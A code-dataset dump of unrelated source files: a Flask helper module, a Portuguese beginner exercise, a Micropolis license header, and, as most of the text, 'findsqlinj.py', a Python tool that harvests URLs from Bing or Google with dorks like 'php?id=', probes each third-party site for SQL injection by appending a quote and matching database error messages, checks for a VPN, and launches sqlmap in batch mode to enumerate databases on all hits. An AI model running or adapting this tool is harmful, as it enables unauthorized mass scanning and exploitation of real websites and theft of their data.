return redirect("/login?return_to=" + urllib.parse.quote_plus(request.url))
else:
if not current_user.admin:
abort(401)
return f(*args, **kwargs)
return wrapper
def json_output(f):
@wraps(f)
def wrapper(*args, **kwargs):
def jsonify_wrap(obj):
jsonification = json.dumps(obj)
return Response(jsonification, mimetype='application/json')
result = f(*args, **kwargs)
if isinstance(result, tuple):
return jsonify_wrap(result[0]), result[1]
if isinstance(result, dict):
return jsonify_wrap(result)
if isinstance(result, list):
return jsonify_wrap(result)
# This is a fully fleshed out response, return it immediately
return result
return wrapper
def cors(f):
@wraps(f)
def wrapper(*args, **kwargs):
res = f(*args, **kwargs)
if request.headers.get('x-cors-status', False):
if isinstance(res, tuple):
json_text = res[0].data
code = res[1]
else:
json_text = res.data
code = 200
o = json.loads(json_text)
o['x-status'] = code
return jsonify(o)
return res
return wrapper
def file_link(path):
return _cfg("protocol") + "://" + _cfg("domain") + "/" + path
def disown_link(path):
return _cfg("protocol") + "://" + _cfg("domain") + "/disown?filename=" + path
# https://stackoverflow.com/questions/4453602/how-to-find-the-mountpoint-a-file-resides-on/4453715#4453715
def find_mount_point(path):
path = os.path.abspath(path)
while not os.path.ismount(path):
path = os.path.dirname(path)
return path
| srht/common.py | 3,063 | This is a fully fleshed out response, return it immediately https://stackoverflow.com/questions/4453602/how-to-find-the-mountpoint-a-file-resides-on/44537154453715 | 163 | en | 0.763137 |
"""
For...in em Python
Iterando strings com for...in
função range recebe esses argumentos (start=0, stop, step=1)
"""
texto = input('informe seu CPF: ')
texto_novo = ''
for letra in range(len(texto)):
if letra % 3 == 0:
texto_novo += '.' + texto[letra]
continue
texto_novo += texto[letra]
print(texto_novo[1:]) | basico/aula019/aula019.py | 341 | For...in em Python
Iterando strings com for...in
função range recebe esses argumentos (start=0, stop, step=1) | 109 | pt | 0.805301 |
#!/usr/bin/python python3
#
# Python script for finding websites which are prone to SQL injections
# Do crawling on bing or google for possible vuln urls
# Check url with qoute ' and catch error messages
# Run sqlmap against urls
#
# License:
# MIT - (c) 2016 ThomasTJ (TTJ)
#
import sys # Quit the shiat
import os # Working with files and starting sqlmap
import re # Searching web results for vuln
import requests # Calling websites
import urllib.parse # Parsing url encoding for search
import shutil # Checking if SQLmap is installed
import psutil # Checking possible VPN connection
import http.client # Ping to check network connection
import random # Shuffle between user agents
import time # Printing time when scraping and checking urls
from time import sleep # Multiple use cases, e.g. sleep between requests
from bs4 import BeautifulSoup # Working with website date
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
ITALIC = '\x1B[3m'
# Variables which needs to be defined
filenameRawUrl = "0"
filenameVulnUrl = "0"
def LoadUserAgents(uafile="user_agents.txt"):
# uafile : string, path to text file of user agents, one per line
uas = []
with open(uafile, 'rb') as uaf:
for ua in uaf.readlines():
if ua:
uas.append(ua.strip()[1:-1-1])
random.shuffle(uas)
return uas
def inputSearchUrls():
print("\n" + bcolors.HEADER)
print(" #===================================#")
print(" # #")
print(" # Find urls which might is vuln for #")
print(" # SQL injections #")
print(" # #")
print(" #===================================#")
print("\n" + bcolors.ENDC)
print(" Basesearch could be: php?id=, php?cat=, e.g.\n")
# =================================
# Base input
# =================================
# @type basesearch: str
# @param basesearch: Query string. Must NOT be url-encoded.
basesearch = input(" Enter base search string: " + bcolors.OKBLUE)
# @type searchprovider: str
# @param searchprovider: Who should perform the search.
searchprovider = input(bcolors.ENDC + " Bing or Google (b/g): " + bcolors.OKBLUE)
if searchprovider.lower() not in ('b', 'g'):
print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
searchprovider = 'b'
# @type maxperpage: int/str (changed to string)
# @param maxperpage: Max results returned per page
maxperpage = input(bcolors.ENDC + " Results per page: " + bcolors.OKBLUE)
if not maxperpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 20")
maxperpage = 20
# @type maxpages: int
# @param maxpages: Max pages to loop through
maxpages = input(bcolors.ENDC + " Number of pages: " + bcolors.OKBLUE)
if not maxpages.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 10")
maxpages = 10
# @type startpage: int
# @param startpage: First page to look in
startpage = input(bcolors.ENDC + " Start pages: " + bcolors.OKBLUE)
if not startpage.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
startpage = 0
if int(startpage) > 0:
startpage = (int(startpage) - 1)
# @type timeout: int
# @param timeout: Sleep between request
timeout = input(bcolors.ENDC + " Enter pause between requests: " + bcolors.OKBLUE)
if not timeout.isdigit():
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 6")
timeout = 6
# @type savesearch: str
# @param savesearch: Save the shiat to a file
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'n'")
savesearch = 'n'
# @type filename: str
# @param filename: Filename for file containing the search results
if savesearch.lower() == "y":
filename = input(bcolors.ENDC + " Filename for search: " + bcolors.OKBLUE)
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(bcolors.WARNING + " - User disallowed appending to resultfile")
print(bcolors.WARNING + " - Please try again with another filename")
print(bcolors.WARNING + " - Exiting")
sys.exit()
else:
filename = ""
filename = "tmpurllist"
# =================================
# Make variables ready to use
# =================================
count = str(maxperpage)
startpage = int(startpage)
pages = (int(maxpages) + startpage)
sleeptime = int(timeout)
string = str(basesearch)
stringurl = urllib.parse.quote_plus(string)
print(bcolors.ENDC + "\n [*]:: Searching")
print(bcolors.HEADER + bcolors.BOLD + "\n" + " [+] Results" + bcolors.ENDC)
searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename)
def searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename):
# =================================
# Loop through pages
# =================================
for start in range(startpage, pages):
# try:
# =========================
# Bing search
# =========================
if searchprovider == "b":
pagenr = int(start)*int(count)+1
address = "http://www.bing.com/search?q=instreamset:(url title):" + stringurl + "&count=" + count + "&first=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('h2'):
for a in d.find_all('a', href=True):
if string in a['href']:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + a['href'] + bcolors.ENDC
)
if filename:
with open(filename, 'a') as file:
file.write(a['href'] + "\n")
elif "0.r.msn." in a['href']:
pass
else:
pass
sleep(sleeptime)
# =========================
# Google search
# =========================
elif searchprovider == "g":
pagenr = int(start)*int(count)
address = "https://www.google.dk/search?q=" + stringurl + "&num=" + count + "&start=" + str(pagenr)
# address = "https://www.google.dk/search?q=inurl%3A" + stringurl + "&num=" + count + "&start=" + str(pagenr)
print(" [*] Page number: " + str(int(start)+1))
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(address, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
for d in soup.find_all('cite'):
url = d.text
if string in url:
print(
bcolors.OKGREEN
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] " + url + bcolors.ENDC
)
if filename == "y":
with open(filename, 'a') as file:
file.write(url + "\n")
sleep(sleeptime)
try:
print("")
# =============================
# Error, end, exit
# =============================
except KeyboardInterrupt:
print(bcolors.FAIL + " User input - Ctrl + c" + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
except:
print(bcolors.FAIL + " ERROR!!! " + bcolors.ENDC)
# =================================
# Done - sum it up
# =================================
print("\n Done scraping")
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
if savesearch == "y":
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
else:
print(" Total urls collected: " + str(resultsnumber))
# Check urls? Next function activates..
checkurls = input(bcolors.ENDC + "\n Would you like to check urls for vuln (Y/n): " + bcolors.OKBLUE)
if checkurls.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
checkurls = "y"
if checkurls == "n":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
checkUrlsForVuln(filename)
def checkUrlsForVuln(filenameRawUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Check if urls is vuln for #")
print(" # SQL injection #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
# =================================
# Base input
# =================================
# Base input
if filenameRawUrl != "0":
print(" Filepath from run is still in memory: " + filenameRawUrl)
urlfileChoose = input(bcolors.ENDC + " (i)nput new filename, or (u)se from memory (i/U): " + bcolors.OKBLUE)
if urlfileChoose not in ('i', 'u'):
print(bcolors.WARNING + " - Using from memory")
urlfileChoose = 'u'
if urlfileChoose == 'u':
urlfile = filenameRawUrl
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
else:
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(urlfile):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
# @type verboseactive: str
# @param verboseactive: Verboselevel.
verboseactive = input(bcolors.ENDC + " Verboselevel (0, 1, 2): " + bcolors.OKBLUE)
if not verboseactive:
print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
verboseactive = "0"
# @type savesearch: str
# @param savesearch: Save the scan to file.
savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
if savesearch.lower() not in ('', 'y', 'n'):
print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
savesearch = 'y'
# @type filename: str
# @param filename: Filename for the shiat.
if savesearch == "y":
filename = input(bcolors.ENDC + " Filename for results: " + bcolors.OKBLUE)
if not filename:
print(bcolors.WARNING + " - Wrong input - using 'vulnurls' as filename")
filename = "vulnurls"
if not os.path.isfile(filename):
os.mknod(filename)
else:
appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
if appendtofile == "n":
print(" User disallowed appending to resultfile")
print(" Please try again with another filename")
print(" Exiting")
sys.exit()
else:
filename = "0"
print(bcolors.ENDC + "\n [*]::Reading file\n")
print(" [*] Connecting\n")
# =================================
# Loop through urls and add a qoute
# =================================
with open(urlfile) as fileorg:
for line in fileorg:
checkMY1 = 0
checkMY2 = 0
checkMY3 = 0
checkMY4 = 0
checkMS1 = 0
checkMS2 = 0
checkMS3 = 0
checkOR1 = 0
checkOR2 = 0
checkOR3 = 0
checkPO1 = 0
checkPO2 = 0
try:
# Get data
url = line + "'"
print(
" ["
+ time.strftime("%H:%M:%S")
+ "] [*] " + line.strip('\n')
)
# Loading random useragent
uas = LoadUserAgents()
ua = random.choice(uas) # select a random user agent
headers = {"Connection": "close", "User-Agent": ua}
r = requests.get(url, headers=headers)
soup = BeautifulSoup(r.text, 'lxml')
# Check if vuln - might updated indicationstrings according to
# MySQL
checkMY1 = len(soup.find_all(text=re.compile('check the manual that corresponds to your MySQL')))
checkMY2 = len(soup.find_all(text=re.compile('SQL syntax')))
checkMY3 = len(soup.find_all(text=re.compile('server version for the right syntax')))
checkMY4 = len(soup.find_all(text=re.compile('expects parameter 1 to be')))
# Microsoft SQL server
checkMS1 = len(soup.find_all(text=re.compile('Unclosed quotation mark before the character string')))
checkMS2 = len(soup.find_all(text=re.compile('An unhanded exception occurred during the execution')))
checkMS3 = len(soup.find_all(text=re.compile('Please review the stack trace for more information')))
# Oracle Errors
checkOR1 = len(soup.find_all(text=re.compile('java.sql.SQLException: ORA-00933')))
checkOR2 = len(soup.find_all(text=re.compile('SQLExceptionjava.sql.SQLException')))
checkOR3 = len(soup.find_all(text=re.compile('quoted string not properly terminated')))
# Postgre SQL
checkPO1 = len(soup.find_all(text=re.compile('Query failed:')))
checkPO2 = len(soup.find_all(text=re.compile('unterminated quoted string at or near')))
# Verbose level 1
if verboseactive == "1":
print(" [V] Check1 MySQL found: " + str(checkMY1))
print(" [V] Check2 MySQL found: " + str(checkMY2))
print(" [V] Check3 MySQL found: " + str(checkMY3))
print(" [V] Check4 MySQL found: " + str(checkMY4))
print(" [V] Check5 MS SQL found: " + str(checkMS1))
print(" [V] Check6 MS SQL found: " + str(checkMS2))
print(" [V] Check7 MS SQL found: " + str(checkMS3))
print(" [V] Check8 Oracle found: " + str(checkOR1))
print(" [V] Check9 Oracle found: " + str(checkOR2))
print(" [V] Check10 Oracle found: " + str(checkOR3))
print(" [V] Check11 Postgre found: " + str(checkPO1))
print(" [V] Check12 Postgre found: " + str(checkPO2))
# Verbose level 2
if verboseactive == "2":
checkverMY1 = soup.find(text=re.compile('check the manual that corresponds to your MySQL'))
checkverMY2 = soup.find(text=re.compile(r'SQL syntax'))
checkverMY3 = soup.find(text=re.compile(r'server version for the right syntax'))
checkverMY4 = soup.find(text=re.compile('expects parameter 1 to be'))
print(" [V] Check1 MySQL found: " + str(checkverMY1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check2 MySQL found: " + str(checkverMY2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check3 MySQL found: " + str(checkverMY3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check4 MySQL found: " + str(checkverMY4).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverMS1 = soup.find(text=re.compile('Unclosed quotation mark before the character string'))
checkverMS2 = soup.find(text=re.compile('An unhanded exception occurred during the execution'))
checkverMS3 = soup.find(text=re.compile('Please review the stack trace for more information'))
print(" [V] Check5 MS SQL found: " + str(checkverMS1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check6 MS SQL found: " + str(checkverMS2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check7 MS SQL found: " + str(checkverMS3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverOR1 = soup.find(text=re.compile('java.sql.SQLException: ORA-00933'))
checkverOR2 = soup.find(text=re.compile('SQLExceptionjava.sql.SQLException'))
checkverOR3 = soup.find(text=re.compile('quoted string not properly terminated'))
print(" [V] Check8 Oracle found: " + str(checkverOR1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check9 Oracle found: " + str(checkverOR2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check10 Oracle found: " + str(checkverOR3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverPO1 = soup.find(text=re.compile('Query failed:'))
checkverPO2 = soup.find(text=re.compile('unterminated quoted string at or near'))
print(" [V] Check11 Postgre found: " + str(checkverPO1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check12 Postgre found: " + str(checkverPO2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
# If X is vuln
if (checkMY1 > 0 or checkMY2 > 0 or checkMY3 > 0 or checkMY4 > 0 or checkMS1 > 0 or checkMS2 > 0 or checkMS3 > 0 or checkOR1 > 0 or checkOR2 > 0 or checkOR3 > 0 or checkPO1 > 0 or checkPO2):
print(
bcolors.OKGREEN
+ "\n"
+ " Possible vuln url!"
+ "\n"
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] "
+ line + bcolors.ENDC
+ "\n"
)
if savesearch == "y":
with open(filename, 'a') as file:
file.write(line)
else:
print(
bcolors.WARNING
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [-] " + line + bcolors.ENDC
)
# Skip X or/and exit
except KeyboardInterrupt:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
# Bad X
except:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
# =================================
# Done - sum it up
# =================================
print("\n Done scanning urls")
if savesearch == "y":
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
if resultsnumber == 0:
print(" No vuln urls, exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
checkurls = input(bcolors.ENDC + "\n Would you like to run the urls through sqlmap (y/N): " + bcolors.OKBLUE)
if checkurls == "y":
try:
os.remove("tmpurllist")
except OSError:
pass
scanUrlsSQLmap(filename)
else:
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
def scanUrlsSQLmap(filenameVulnUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Scan urls with #")
print(" # SQLmap #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
# =================================
# Check if sqlmap installed, file, etc.
# =================================
if shutil.which('sqlmap') is None:
print(" SQLmap is not installed on system - can't go on.")
print(" Install sqlmap and run command below (sudo pacman -S sqlmap, sudo apt-get install sqlmap, etc.)")
print(" \nCommand:")
print(" sqlmap -m \"" + filenameVulnUrl + "\n")
else:
if filenameVulnUrl == "0":
print(" No filename in memory, please specify.")
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
filenameVulnUrl = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(filenameVulnUrl):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
print(bcolors.ENDC + " SQLmap will be started with arguments dbs, batch, random-agent, 4xthreads.")
fileDestination = (os.getcwd() + "/" + filenameVulnUrl)
command = ('sqlmap -m ' + fileDestination + " --dbs --batch --random-agent --threads 4")
print("Command to execute: " + command)
input(bcolors.ENDC + " Press enter to continue\n")
print(bcolors.ENDC + " Starting SQLmap - follow onscreen instructions")
print(bcolors.BOLD + " Press Ctrl + c to exit\n\n\n")
# RUN SQLMAP !!
os.system(command)
# Not implemented - specify saving destination
# @type savingplace: str
# @param savingplace: Who should perform the search.
# savingplace = input(bcolors.ENDC + " Specify folder where results will be placed: " + bcolors.OKBLUE)
# if savingplace not in ('b', 'g'):
# print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
# savingplace = 'b'
def helpme():
print("\n\n" + bcolors.HEADER)
print(" .---. .---. .-''-. .---. .-------. ,---. ,---. .-''-. ")
print(" | | |_ _| .'_ _ \ | ,_| \ _(`)_ \ | \ / | .'_ _ \ ")
print(" | | ( ' ) / ( ` ) ',-./ ) | (_ o._)| | , \/ , | / ( ` ) ' ")
print(" | '-(_{;}_). (_ o _) |\ '_ '`) | (_,_) / | |\_ /| |. (_ o _) | ")
print(" | (_,_) | (_,_)___| > (_) ) | '-.-' | _( )_/ | || (_,_)___| ")
print(" | _ _--. | ' \ .---.( . .-' | | | (_ o _) | |' \ .---. ")
print(" |( ' ) | | \ `-' / `-'`-'|___ | | | (_,_) | | \ `-' / ")
print(" (_{;}_)| | \ / | \/ ) | | | | \ / ")
print(" '(_,_) '---' `'-..-' `--------``---' '--' '--' `'-..-' ")
print("\n\n" + bcolors.ENDC)
print(" This python script is developed to show, how many vulnerables websites,")
print(" which are laying around on the web. The main focus of the script is to")
print(" generate a list of vuln urls. Please use the script with causing and")
print(" alert the webadmins of vulnerable pages. The SQLmap implementation is")
print(" just for showcasing.")
print("")
print(" The script is divided into 3 main sections.\n")
print(bcolors.BOLD + " # Section 1" + bcolors.ENDC)
print(" In this section you have to provide a search string, which 'connects' to")
print(" the websites database, e.g. 'php?id='. The script then crawls")
print(" Bing or Google for urls containing it. All of the urls can then be saved")
print(" into a file. (Please be aware that you might get banned for crawling to")
print(" fast, remember an appropriate break/sleep between request).")
print(bcolors.ITALIC + " Example of searchs: php?bookid=, php?idproduct=, php?bookid=, php?catid=,")
print(" php?action=, php?cart_id=, php?title=, php?itemid=" + bcolors.ENDC)
print("")
print(bcolors.BOLD + " # Section 2" + bcolors.ENDC)
print(" This section adds a qoute ' to the websites url. If the website is")
print(" prone to SQL injection, we'll catch this with some predefined error")
print(" messages. The script will not add websites for blind SQL injections,")
print(" due to the predefined error messages.")
print("")
print(bcolors.BOLD + " # Section 3" + bcolors.ENDC)
print(" This is just an activation of sqlmap with the bulk argument and no")
print(" user interaction for validation of SQL injection.")
print("")
print("\n")
print(bcolors.BOLD + " Stay safe and help the vulnerables" + bcolors.ENDC)
print("\n")
sys.exit()
def checkConnection():
# Header request for net connectivity
print(bcolors.ENDC + "\n [*] Checking network connection" + bcolors.ENDC)
conn = http.client.HTTPConnection("www.microsoft.com", 80)
try:
conn.request("HEAD", "/")
print(bcolors.OKGREEN + " [+] Network connection seems OK" + bcolors.ENDC)
except:
print(bcolors.FAIL + " [-] Network connection seems down" + bcolors.ENDC)
# Checking for tun0 or ppp
print(bcolors.ENDC + " [*] Checking VPN connection" + bcolors.ENDC)
if re.match(r'tun.', 'tun') or re.match(r'ppp.', 'ppp') not in psutil.net_if_addrs():
print(bcolors.WARNING + " [-] No indication of a VPN connection on tun or ppp found.")
choice = input(bcolors.ENDC + " Continue (y/N): " + bcolors.OKBLUE)
if choice.lower() == "y":
print(bcolors.ENDC + " ")
else:
sys.exit()
else:
print(bcolors.OKGREEN + " [+] Indications of a VPN. Good. Will continue." + bcolors.ENDC)
startpage()
def startpage():
print("\n")
print(bcolors.BOLD + " Please choose your weapon of mass destruction:")
print(bcolors.BOLD + " 1" + bcolors.ENDC + " - Scrape the web for possible vuln urls")
print(bcolors.BOLD + " 2" + bcolors.ENDC + " - Check the urls for vulnerabilities")
print(bcolors.BOLD + " 3" + bcolors.ENDC + " - Bulk exploit urls with sqlmap")
print(bcolors.BOLD + " 4" + bcolors.ENDC + " - Help me")
print("\n")
# @type choice: str
# @param choice: Weapon of massdestruction
choice = input(bcolors.ENDC + " Enter choice numer (1, 2, 3, 4): " + bcolors.OKBLUE)
if not choice.isdigit():
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice not in ('1', '2', '3', '4'):
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice == "1":
inputSearchUrls()
elif choice == "2":
checkUrlsForVuln(filenameRawUrl)
elif choice == "3":
scanUrlsSQLmap(filenameVulnUrl)
elif choice == "4":
helpme()
def main():
os.system('clear')
print("\n\n")
print(" _____ __ _____ ____ __ _ _ __ _ ")
print(" / __(_)___ ____/ / / ___// __ \ / / (_)___ (_)__ _____/ /_(_)___ ____ ")
print(" / /_/ / __ \/ __ / \__ \/ / / / / / / / __ \ / / _ \/ ___/ __/ / __ \/ __ |")
print(" / __/ / / / / /_/ / ___/ / /_/ / / /___ / / / / / / / __/ /__/ /_/ / /_/ / / / /")
print(" /_/ /_/_/ /_/\__,_/ /____/\___\_\/_____/ /_/_/ /_/_/ /\___/\___/\__/_/\____/_/ /_/ ")
print(" /___/ ")
print("\n\n")
checkConnection()
# GO GO GO
main()
| findsqlinj.py | 30,755 | !/usr/bin/python python3 Python script for finding websites which are prone to SQL injections Do crawling on bing or google for possible vuln urls Check url with qoute ' and catch error messages Run sqlmap against urls License: MIT - (c) 2016 ThomasTJ (TTJ) Quit the shiat Working with files and starting sqlmap Searching web results for vuln Calling websites Parsing url encoding for search Checking if SQLmap is installed Checking possible VPN connection Ping to check network connection Shuffle between user agents Printing time when scraping and checking urls Multiple use cases, e.g. sleep between requests Working with website date Variables which needs to be defined uafile : string, path to text file of user agents, one per line ================================= Base input ================================= @type basesearch: str @param basesearch: Query string. Must NOT be url-encoded. @type searchprovider: str @param searchprovider: Who should perform the search. @type maxperpage: int/str (changed to string) @param maxperpage: Max results returned per page @type maxpages: int @param maxpages: Max pages to loop through @type startpage: int @param startpage: First page to look in @type timeout: int @param timeout: Sleep between request @type savesearch: str @param savesearch: Save the shiat to a file @type filename: str @param filename: Filename for file containing the search results ================================= Make variables ready to use ================================= ================================= Loop through pages ================================= try: ========================= Bing search ========================= Loading random useragent select a random user agent ========================= Google search ========================= address = "https://www.google.dk/search?q=inurl%3A" + stringurl + "&num=" + count + "&start=" + str(pagenr) Loading random useragent select a random user agent ============================= Error, end, exit ============================= ================================= Done - sum it up ================================= Check urls? Next function activates.. ================================= Base input ================================= Base input @type urlfile: str @param urlfile: File with the raw urls to check. @type urlfile: str @param urlfile: File with the raw urls to check. @type verboseactive: str @param verboseactive: Verboselevel. @type savesearch: str @param savesearch: Save the scan to file. @type filename: str @param filename: Filename for the shiat. ================================= Loop through urls and add a qoute ================================= Get data Loading random useragent select a random user agent Check if vuln - might updated indicationstrings according to MySQL Microsoft SQL server Oracle Errors Postgre SQL Verbose level 1 Verbose level 2 If X is vuln Skip X or/and exit Bad X ================================= Done - sum it up ================================= ================================= Check if sqlmap installed, file, etc. ================================= @type urlfile: str @param urlfile: File with the raw urls to check. RUN SQLMAP !! Not implemented - specify saving destination @type savingplace: str @param savingplace: Who should perform the search. savingplace = input(bcolors.ENDC + " Specify folder where results will be placed: " + bcolors.OKBLUE) if savingplace not in ('b', 'g'): print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'") savingplace = 'b' Header request for net connectivity Checking for tun0 or ppp @type choice: str @param choice: Weapon of massdestruction GO GO GO | 3,671 | en | 0.6153 |
# micropolisnoticepanel.py
#
# Micropolis, Unix Version. This game was released for the Unix platform
# in or about 1990 and has been modified for inclusion in the One Laptop
# Per Child program. Copyright (C) 1989 - 2007 Electronic Arts Inc. If
# you need assistance with this program, you may contact:
# http://wiki.laptop.org/go/Micropolis or email micropolis@laptop.org.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details. You should have received a
# copy of the GNU General Public License along with this program. If
# not, see <http://www.gnu.org/licenses/>.
#
# ADDITIONAL TERMS per GNU GPL Section 7
#
# No trademark or publicity rights are granted. This license does NOT
# give you any right, title or interest in the trademark SimCity or any
# other Electronic Arts trademark. You may not distribute any
# modification of this program using the trademark SimCity or claim any
# affliation or association with Electronic Arts Inc. or its employees.
#
# Any propagation or conveyance of this program must include this
# copyright notice and these terms.
#
# If you convey this program (or any modifications of it) and assume
# contractual liability for the program to recipients of it, you agree
# to indemnify Electronic Arts for any liability that those contractual
# assumptions impose on Electronic Arts.
#
# You may not misrepresent the origins of this program; modified
# versions of the program must be marked as such and not identified as
# the original program.
#
# This disclaimer supplements the one included in the General Public
# License. TO THE FULLEST EXTENT PERMISSIBLE UNDER APPLICABLE LAW, THIS
# PROGRAM IS PROVIDED TO YOU "AS IS," WITH ALL FAULTS, WITHOUT WARRANTY
# OF ANY KIND, AND YOUR USE IS AT YOUR SOLE RISK. THE ENTIRE RISK OF
# SATISFACTORY QUALITY AND PERFORMANCE RESIDES WITH YOU. ELECTRONIC ARTS
# DISCLAIMS ANY AND ALL EXPRESS, IMPLIED OR STATUTORY WARRANTIES,
# INCLUDING IMPLIED WARRANTIES OF MERCHANTABILITY, SATISFACTORY QUALITY,
# FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT OF THIRD PARTY
# RIGHTS, AND WARRANTIES (IF ANY) ARISING FROM A COURSE OF DEALING,
# USAGE, OR TRADE PRACTICE. ELECTRONIC ARTS DOES NOT WARRANT AGAINST
# INTERFERENCE WITH YOUR ENJOYMENT OF THE PROGRAM; THAT THE PROGRAM WILL
# MEET YOUR REQUIREMENTS; THAT OPERATION OF THE PROGRAM WILL BE
# UNINTERRUPTED OR ERROR-FREE, OR THAT THE PROGRAM WILL BE COMPATIBLE
# WITH THIRD PARTY SOFTWARE OR THAT ANY ERRORS IN THE PROGRAM WILL BE
# CORRECTED. NO ORAL OR WRITTEN ADVICE PROVIDED BY ELECTRONIC ARTS OR
# ANY AUTHORIZED REPRESENTATIVE SHALL CREATE A WARRANTY. SOME
# JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF OR LIMITATIONS ON IMPLIED
# WARRANTIES OR THE LIMITATIONS ON THE APPLICABLE STATUTORY RIGHTS OF A
# CONSUMER, SO SOME OR ALL OF THE ABOVE EXCLUSIONS AND LIMITATIONS MAY
# NOT APPLY TO YOU.
########################################################################
# Micropolis Status View
# Don Hopkins
########################################################################
# Import stuff
from gi.repository import Gtk as gtk
import cairo
from gi.repository import Pango as pango
from . import micropolisengine
from . import micropolisview
from . import micropolisnoticeview
